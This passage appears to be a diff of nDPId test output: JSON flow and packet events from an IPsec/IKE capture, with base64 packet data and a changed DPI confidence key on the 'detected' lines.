+O7E63S\/2oZe60EsKc1cNancp1xVIeK61Uxkni6d2O0j+NSXm8I+KbKCEsM8jktpVXjmOVnPHyuo9eeXJIhp8gexGSxUK1dF6Wb\/51j9mrJ6Rez4bGL2iuUAQ04aj0Ztuyp91rVSixxaUhqznAlebdvq7zw57FRYAGSwth67wRXsRtuptzlC92fMDUdQWF4\/q7Rg4ccMJF8RTqsCfv\/V5UkM4rN4lMhQLv9leCJg4L4VtlUhELb\/dmwApKHfm4qZ+AvwxRrhYksS4iWBYqPRAJpUwCdGnnGSqMBh3o6p6oq9yU+MJfyC7xA6IGAc5Da5Gt8ZyEcwo8JJWiwHu7dBeWjkvoyi6haT0hZBaq4CC5QTRFLa9S5ajUP40DdvqDMTYmfONTFGQA6d2YC17keI7odwHkGPKSlOt8w+jF8Dti71cbXyWEQJdY+ZVQdwHfTeUcrnxYVMpy7BP4dMcdpRdfc4lg\/QbRKOdKk0hT5LuCXF0M3Vp\/LEZa7FwCq638sPDKBcUlLhWwxQDFXGZJRnNhauA2AsjOr8gPCtSrE84a00K6Rme00o2hpitbodAaLdhM+MJrhzUFjCUrk+AIvDAWX+uOvXRH6A7qL"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsEjkAAPcRw+tt7bviwKgCZBGUOKQA2NOBAAAAAKsLMF9aXVpU8rNpjARABmguICMgAAAAAQAAAMwkAACwlJd8WVcVfeBQmkN5fuj2YUx6tDxIVbQvy2JQRd\/BtL4hXpKJzs\/swh9hLZeQKsbMp\/sy\/av\/bbUA1jEWVrhNWIPQTh6mM4lKY0bMGYNJnwKWMpvDypsZQVORgQLb\/inT5fJkB85cKyuZ+OpfJNkxWxJ8xlgnHQZNmWhknOe41lnZLuRVg3w85pw0ONcgDXn5tgFkGuxKxNyj8Xr3SY\/nJqVuAzK+TYqBB8TmXQ=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMUeNAAD8R\/KHAqAJkbe274jikEZQAeP5qAAAAAKsLMF9aXVpU8rNpjARABmguICMIAAAAAgAAAGwwAABQ0MVvdAw+LEqFA+nmF6i+XI58eiVp1GRV\/rWe4MnVHMpW8WwgWN8kiN6DP4sWq+W6GDQg7Lq8MyuzO0xwSZTAHDjDg8bbx5JyeewH2w=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkfBRAAD8R0DjAqAJkbe27gikEAfQDEGb1zXuuLUv9pz4AAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAALekGQeyXWU\/60toX74oI0NOPrQEorT913B5RWuu2HN1uo6YOszdlN6tok1qsbs6hmVmZJrWGXgOe3sFZUtEGtWNQ8t7Aa2Mt0TQHl9URPDFrZpMIDNYSLz2uksGoJV4Y6wEfAxTeZYeEH8X4gcBz7P\/QA6cRN0\/JVa9p1v0\/57HKQAAJDvJ2clyg7FCIyXAj1uqYyldr2SIGMxOXOwB1SVwhMTkKQAAHAAAQATF2N6DrOv0hzfW361l0T7OSbO+kwAAABwAAEAFMV3HOKq0Fujlh4APMbK5f7RIWno="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQkyoAAPYRRPZt7buCwKgCZAH0KQQAPF4QzXuuLUv9pz4AAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAABq0Q7n6QjJnJsuTER7qA=="} 
01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"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\/60toX74oI0NOPrQEorT913B5RWuu2HN1uo6YOszdlN6tok1qsbs6hmVmZJrWGXgOe3sFZUtEGtWNQ8t7Aa2Mt0TQHl9URPDFrZpMIDNYSLz2uksGoJV4Y6wEfAxTeZYeEH8X4gcBz7P\/QA6cRN0\/JVa9p1v0\/57HKQAAJDvJ2clyg7FCIyXAj1uqYyldr2SIGMxOXOwB1SVwhMTkKQAAHAAAQATF2N6DrOv0hzfW361l0T7OSbO+kwAAABwAAEAFMV3HOKq0Fujlh4APMbK5f7RIWno="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMfCFAAD8R0APAqAJkbe27gjikEZQDOCAiAAAAAM17ri1L\/ac+HEFGvwEgEbUuICMIAAAAAQAAAywjAAMQ469lGmPc0hEi4\/rpKiGNJD5Nq3zlOv1Ml0GnlFKZ1XFdIX2l2YH07yFoJhfYZ2uPmk\/EvBYB5IwL1MpwJsetr2cZ8C2kW68lmBiPVHDkzVz1FpqFwUeXxsTO\/Mne10x8MSBJZeDYyhjRenBg3qSQ1uh4sNnAjwGFkmEcoZY67hDaUrE6wNAw9EmuFPveCUXZ3pwm+gN1qANqoDeOuU+OiOaHkRLZm4QshDsPQjnKVG+6dJ+FCJmeIjP+zfNtwm0D9ZIK1sH7KgHGb\/8OnIRTLElll85J5T9YxF\/tXUFiIdklrebmdtfN++jPvpIp5BroJhVNhCZx9TbCKAFIqpkZjSTypUKXVA4HW7iOuOQrFR3wlNQXJqjxT115EzTgAdQoemZr4vifC\/9RIxTB46YkugRBKYxip\/BhFbmOLAfuuRU8q1HCwxb5QcTPdno6A7IcuG50\/ldiPpMbFCHNogwzNfD1Rm4LuR5g4O7LzbiB0HgfSGDpQQ1sccieUvGtWwS5yJJdcWhQsSn7aQGNkfN+NUSUJ6z3Uoix6ULjG3ES7H\/3x+Drxi7D+3CxKOij6nCVqh+v89ZPL8\/TlaeEofmgfO4Nqb4uT1s3AsTLAeEUuFmlcmIULbCyw0RXNDSB+BPNYmAi7IiuA6q+gmBXqR4a+RtHymCDcYLEHwDW0cHx5vpFt2YeIu261FNKYH0qcFZ5DpoHNL109VmvYUglfOOgGnETPAP+ueLV4Jt31JG0U7yGwUsfYEfW9Nw1KEhI\/HAzn9q0\/y0eNexl9abCbKpbCwVRqP1jZb0g\/BvxC5rt6knjqRXDXiOiAHZwdEPRAi815hn8JfgceuT4I5RXaQ1slfVaPhlrteTbnEq9UmEuoG6O9s\/QMqHx0huvA7savNo2cZnm+Jkm3qpMJxuZUDI9jP775IRGH2Q5LYdBdhjjwE6BJodj\/v8xocqeSrw5TgLnTred0263arnrnaKLSz6c91YGE3+E1R\/TbdN5fgCta0W+jhywiGo1m7Mmt2cdZwGYfhtyqsp5broKOCsH"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsk6IAAPYRQ+Jt7buCwKgCZBGUOKQA2IekAAAAAM17ri1L\/ac+HEFGvwEgEbUuICMgAAAAAQAAAMwkAACwnjHnEXtSQ9YBTsYWhNWWL2lb3zCSVGmtTzEvh47BEs\/bjLyBXTJjuCqg7wWeV74OlRvZj2lbuv2HF8N25vmjxy2gOj3GTSIkrJ81O5xBYrk\/DO\/U3vnDhNrRnxnnbUAcri8CK4colHYFHy00rAAnAiq\/J3y\/4Psn7O2YNdeQxTN+FVKTTs+PkcU9iJQYjyeso5yATeFNdg3Yo2REPpR\/v53srr2DXIiU+rV2BA=="} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMfEZAAD8R0p7AqAJkbe27gjikEZQAeEKcAAAAAM17ri1L\/ac+HEFGvwEgEbUuICMIAAAAAgAAAGwwAABQ4uWpvKvs0+Grd38C+Ik2kAU8jJda\/\/ZCHQQBPzJXFKXfyLyFjecJewBE8lyFFdf5WHr93Xl19FueaRtvNm5eWTihSgwraMBcuUWyzQ=="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01007{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":458,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":458,"pkt_l4_len":424,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAG8AURAAP0RjjHAqAJkbe27waZhEZQBqLXBAAAAABcjot1R1L2v9VP\/ZQPMlAYuICMIAAAAAQAAAZwjAAGAFzlsP7YgimBjfIhMJEPhZdw0CnuZSvY37VZC7a055Lu7e+IEFmagHoqj\/3VU94cqC6SemXaaay0d\/2HUKJiZnpCAdCpw2HQ0KrTFW857JbKQ5j3IjKxRjcUYXqtMskX1DsgbCtObqa65cF5WltmtdmwVSANhLzG0LAR+CYEUUulm5YiOyMOFPbHpSrtDM2EEADmkbnPxO00Rexy0LvWXHDnINrIOiYbG6hzWEPIEI9Eq\/yH+hgIb4D\/vUKMOXGmPYj6eX3YPkbs08cGm1IBTDEzAwFQ6+Dut0IKwpkVjd+zPi5GajMElxeEZqtJlXKjo9Q5m9\/Z280gMX0Ev66KMtd6K6mBxkfkxU48zqh5WNlzUeROBsXFhnHi99g6+xt5SosQj2gpfId\/yriJfKS5T7sFkMpq5UCC9LwpNDHHYOliSKEorplbbZFT5pCqGgvpGJkdN1m+eylUPZy+lsCygyTo96r1KrC7wKmw+U5ttVkc6oJ49jPR1mswYgKs="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsDNQAAPcRyXFt7bvBwKgCZBGUpmEA2LFTAAAAABcjot1R1L2v9VP\/ZQPMlAYuICMgAAAAAQAAAMwkAACwt8DrlJ+m2al2nqC6R0IPssF2L9y4SqKRlJmL3oRcq8RKQ2ObMHo4zQyEslOWTLC32j2ahp4JmnhkcJsAT1Ry5ttL3i23NLV5nDm5L7NCBAUkcaeumkXhzzHIEE7JLNBFfwKX9ajX1xrYBwFX63nezSYk14HlosNo\/wudM5KsK1FFycc\/dtaMmPuiBcgAypmEGH8GzTU8DwauD7bD0L3m78gqkvO5SOE4lAbfug=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMAUVAAP0Rj2DAqAJkbe27waZhEZQAeI5AAAAAABcjot1R1L2v9VP\/ZQPMlAYuICMIAAAAAgAAAGwwAABQFzlsP7YgimBjfIhMJEPhZfNKbhKkUop45dKn+ZaQvlBgZFipb1gl3b\/yGDnUYTjHBXhpSa2HaEtAKP+u9gU0mUFlekP9JG9k5fmbAw=="} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAFsAUBAAP0RjoXAqAJkbe27waZhAfQBWFaoeYM\/SkK01zcAAAAAAAAAACEgIggAAAAAAAABUCIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAAAYLYUGuZ6wRrF76F6Wg4SSmTXUbMrt\/uvkUwBae6Z8ffl31Qp9Pe8kpQLuvpdgDfuC1lFI5d2eInFhSKN2p5l2MMxLCVh5vAZdUmYBGKNydDABJoY\/t2cMJAQMYGrAiasUQAFL5ua2kwx4aur4JnIDxYlsa+kOEok7rfcNe567iikAABhGdIqQZwLuydnmghUWKRm0Vg7igikAABwAAEAERAVvgCvrSECDMOeubOqiQEdUN7AAAAAcAABABWB6cf2AaUay5FZ3OLynoSnQ1+Y8"} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQCh8AAPcRzMJt7bvBwKgCZAH0pmEAPMlxeYM\/SkK01zcAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWNOkd\/egKWX5A4HacWg=="} 
00928{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":402,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":402,"pkt_l4_len":368,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAGEAUFAAP0RjmzAqAJkbe27waZhAfQBcKqaeYM\/SkK01zcAAAAAAAAAACkgIggAAAAAAAABaCEAABgAAEAGAAFWNOkd\/egKWX5A4HacWiIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAAAYLYUGuZ6wRrF76F6Wg4SSmTXUbMrt\/uvkUwBae6Z8ffl31Qp9Pe8kpQLuvpdgDfuC1lFI5d2eInFhSKN2p5l2MMxLCVh5vAZdUmYBGKNydDABJoY\/t2cMJAQMYGrAiasUQAFL5ua2kwx4aur4JnIDxYlsa+kOEok7rfcNe567iikAABhGdIqQZwLuydnmghUWKRm0Vg7igikAABwAAEAERAVvgCvrSECDMOeubOqiQEdUN7AAAAAcAABABWB6cf2AaUay5FZ3OLynoSnQ1+Y8"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkKtJAAD8RITvAqAJkbe27wikEAfQDEM\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\/btxDWIa5wgFzCzeQ3x7y72e5UHhqhgvqaYk9jfMQxIVaEW9a\/BsTbbgWHzjuQA+m2wB7LvhFjGB\/zN7IPBMezDEAF2Voyii81jTpzUUJ05HhmyiH0d\/igIqUo6S0VxBu\/wKQAAJJlGk0qPBMMAQyO8c7OtV6h+5wY2ebevcS4SnFRIjN85KQAAHAAAQASbEuzBi4qstlq61cC7lLKgnoRv5wAAABwAAEAFpnJT+g+x